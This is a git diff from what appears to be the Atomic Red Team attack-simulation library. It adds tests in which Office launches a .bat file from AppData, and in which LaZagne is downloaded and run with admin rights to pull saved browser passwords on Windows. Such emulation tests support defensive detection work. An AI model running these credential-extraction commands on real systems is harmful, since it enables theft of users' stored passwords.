+
+#### Cleanup Commands:
+```powershell
+$ms_office_version = #{ms_office_version}
+if (Test-Path (#{bat_path})) { Remove-Item (#{bat_path}) }
+Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Office\$ms_office_version\#{ms_product}\Security\' -Name 'AccessVBOM' -ErrorAction Ignore
+```
+
+
+
+#### Dependencies: Run with `powershell`!
+##### Description: Test Requires MS Office to be installed and have been run previously. Run -GetPrereqs to run msword and build dependant registry keys
+##### Check Prereq Commands:
+```powershell
+$ms_office_version = #{ms_office_version}
+If (Test-Path HKCU:SOFTWARE\Microsoft\Office\$ms_office_version) { exit 0 } else { exit 1 }
```
##### Get Prereq Commands:
```powershell
diff --git a/atomics/T1204.002/T1204.002.yaml b/atomics/T1204.002/T1204.002.yaml
index 38d06ac2..45d8f457 100644
--- a/atomics/T1204.002/T1204.002.yaml
+++ b/atomics/T1204.002/T1204.002.yaml
@@ -147,6 +147,7 @@ atomic_tests:
name: powershell
- name: Office launching .bat file from AppData
+ auto_generated_guid: 9215ea92-1ded-41b7-9cd6-79f9a78397aa
description: Microsoft Office creating then launching a .bat script from an AppData directory. The .bat file launches calc.exe when opened.
supported_platforms:
- windows
diff --git a/atomics/T1555.003/T1555.003.md b/atomics/T1555.003/T1555.003.md
index 7ff76184..9f654a47 100644
--- a/atomics/T1555.003/T1555.003.md
+++ b/atomics/T1555.003/T1555.003.md
@@ -16,6 +16,8 @@ After acquiring credentials from web browsers, adversaries may attempt to recycl
- [Atomic Test #2 - Search macOS Safari Cookies](#atomic-test-2---search-macos-safari-cookies)
+- [Atomic Test #3 - LaZagne - Credentials from Browser](#atomic-test-3---lazagne---credentials-from-browser)
+
@@ -101,4 +103,47 @@ grep -q "#{search_string}" "Cookies.binarycookies"
+
+
+
+## Atomic Test #3 - LaZagne - Credentials from Browser
+The following Atomic test utilizes [LaZagne](https://github.com/AlessandroZ/LaZagne) to extract passwords from browsers on the Windows operating system.
+LaZagne is an open source application used to retrieve passwords stored on a local computer.
+
+**Supported Platforms:** Windows
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| lazagne_path | Path to LaZagne | Path | PathToAtomicsFolder\T1555.003\bin\LaZagne.exe|
+
+
+#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
+
+
+```cmd
+#{lazagne_path} browsers
+```
+
+
+
+
+#### Dependencies: Run with `powershell`!
+##### Description: LaZagne.exe must exist on disk at specified location (#{lazagne_path})
+##### Check Prereq Commands:
+```powershell
+if (Test-Path #{lazagne_path}) {exit 0} else {exit 1}
+```
+##### Get Prereq Commands:
+```powershell
+New-Item -Type Directory (split-path #{lazagne_path}) -ErrorAction ignore | Out-Null
+Invoke-WebRequest "https://github.com/AlessandroZ/LaZagne/releases/download/2.4.3/lazagne.exe" -OutFile "#{lazagne_path}"
+```
+
+
+
+
diff --git a/atomics/T1555.003/T1555.003.yaml b/atomics/T1555.003/T1555.003.yaml
index ec85b06c..784ba955 100644
--- a/atomics/T1555.003/T1555.003.yaml
+++ b/atomics/T1555.003/T1555.003.yaml
@@ -51,3 +51,34 @@ atomic_tests:
cd ~/Library/Cookies
grep -q "#{search_string}" "Cookies.binarycookies"
name: sh
+
+- name: LaZagne - Credentials from Browser
+ auto_generated_guid: 9a2915b3-3954-4cce-8c76-00fbf4dbd014
+ description: |
+ The following Atomic test utilizes [LaZagne](https://github.com/AlessandroZ/LaZagne) to extract passwords from browsers on the Windows operating system.
+ LaZagne is an open source application used to retrieve passwords stored on a local computer.
+
+ supported_platforms:
+ - windows
+
+ input_arguments:
+ lazagne_path:
+ description: Path to LaZagne
+ type: Path
+ default: PathToAtomicsFolder\T1555.003\bin\LaZagne.exe
+
+ dependency_executor_name: powershell
+ dependencies:
+ - description: |
+ LaZagne.exe must exist on disk at specified location (#{lazagne_path})
+ prereq_command: |
+ if (Test-Path #{lazagne_path}) {exit 0} else {exit 1}
+ get_prereq_command: |
+ New-Item -Type Directory (split-path #{lazagne_path}) -ErrorAction ignore | Out-Null
+ Invoke-WebRequest "https://github.com/AlessandroZ/LaZagne/releases/download/2.4.3/lazagne.exe" -OutFile "#{lazagne_path}"
+
+ executor:
+ name: command_prompt
+ elevation_required: true
+ command: |
+ #{lazagne_path} browsers
diff --git a/atomics/used_guids.txt b/atomics/used_guids.txt
index b37349ef..fdff4730 100644
--- a/atomics/used_guids.txt
+++ b/atomics/used_guids.txt
@@ -623,3 +623,5 @@ c70ab9fd-19e2-4e02-a83c-9cfa8eaa8fef
f38e9eea-e1d7-4ba6-b716-584791963827
3723ab77-c546-403c-8fb4-bb577033b235
60e860b6-8ae6-49db-ad07-5e73edd88f5d
+9215ea92-1ded-41b7-9cd6-79f9a78397aa
+9a2915b3-3954-4cce-8c76-00fbf4dbd014